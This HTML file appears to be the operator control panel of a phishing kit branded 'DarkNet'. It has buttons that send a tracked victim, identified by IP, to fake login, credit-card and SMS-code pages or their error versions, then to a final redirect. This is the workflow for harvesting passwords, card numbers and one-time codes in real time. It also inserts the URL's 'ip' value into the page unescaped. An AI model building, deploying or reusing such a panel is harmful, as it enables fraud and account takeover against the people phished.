<!doctype html>
<html>

    <head>
        <!-- Required meta tags -->
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta name="robots" content="noindex," "nofollow," "noimageindex," "noarchive," "nocache," "nosnippet">
        
        <!-- CSS FILES -->
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css">
        <link href="https://cdn.jsdelivr.net/npm/remixicon@3.5.0/fonts/remixicon.css" rel="stylesheet">

        <link rel="icon" type="image/x-icon" href="./Asstes/imgs/logos.jpg" />

        <title>Control</title>
        <style>
            body{
                overflow: hidden;
                background:black;
            }
            .wrapper{
                width:100%;
                height:85vh;
            }
            button[type="submit"]{
                font-size:13px;
            }
            .wrapper img{
                width:100%;
                height:100%;
                object-fit: cover;
                position: absolute;
                opacity:0.02;
                z-index: -1;
                cursor: pointer;
            }
            .ipx{
                animation: bubble 1.0s infinite;
                color:red;
                font-size:14px;
            }
            @keyframes bubble {
                0%   { transform:scale(0.5); opacity:0.0; }
                50%  { transform:scale(1.2); opacity:0.5; }
                100% { transform:scale(1.0); opacity:1.0; }
            }
        </style>
    </head>

    <body>
        <div class="header text-center d-flex justify-content-center flex-column align-items-center py-2" style="background-color: black;">
            <img src="./Asstes/imgs/logos.jpg" alt="" style="width:50px; border-radius:50%;">
            <p class="mb-0" style='color:white;'>DarkNet</p>
        </div>
        <div class="wrapper">
            <img src="./Asstes/imgs/logos.jpg">
            <div class="container text-center pb-3" style="padding-top:70px;">
                <form method="post" action="./Asstes/php/config/control.php" class="d-flex flex-wrap justify-content-center algin-items-center" style="gap:10px">
                    <input type="hidden" name="step" value="control">
           
					<input type="hidden" name="ip" id="ip-hidden" value="">  <!-- Hidden IP Field -->
                    <button type="submit" class="btn btn-success" name="to" value="log">LOGIN</button>
                    <button type="submit" class="btn btn-danger" name="to" value="log_error">LOGIN</button>
                    <button type="submit" class="btn btn-success" name="to" value="card">CC</button> 
                    <button type="submit" class="btn btn-danger" name="to" value="card_error">CC</button> 
                    <button type="submit" class="btn btn-success" name="to" value="sms">SMS</button> 
                    <button type="submit" class="btn btn-danger" name="to" value="sms_error">SMS</button> 
                    <button type="submit" class="btn btn-success" name="to" value="success"><i class="ri-home-3-fill"></i></button>
                </form>
            </div>
            <div class="ip" id="ip-container">
			
			

        </div>
		
   <script>
        // Function to get the IP from URL query parameters
      function getIPFromURL() {
    const urlParams = new URLSearchParams(window.location.search);
    const ip = urlParams.get('ip');
    
    if (ip) {
        const ipHidden = document.getElementById('ip-hidden');
        const ipContainer = document.getElementById('ip-container');

        if (ipHidden) {
            ipHidden.value = ip;
        }
        if (ipContainer) {
            ipContainer.innerHTML = `<p class="text-center ipx">${ip}</p>`;
        }
    }
}

        window.onload = getIPFromURL;
    </script>
        <!-- JS FILES -->
        <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/js/all.min.js"></script>
       

    </body>

</html>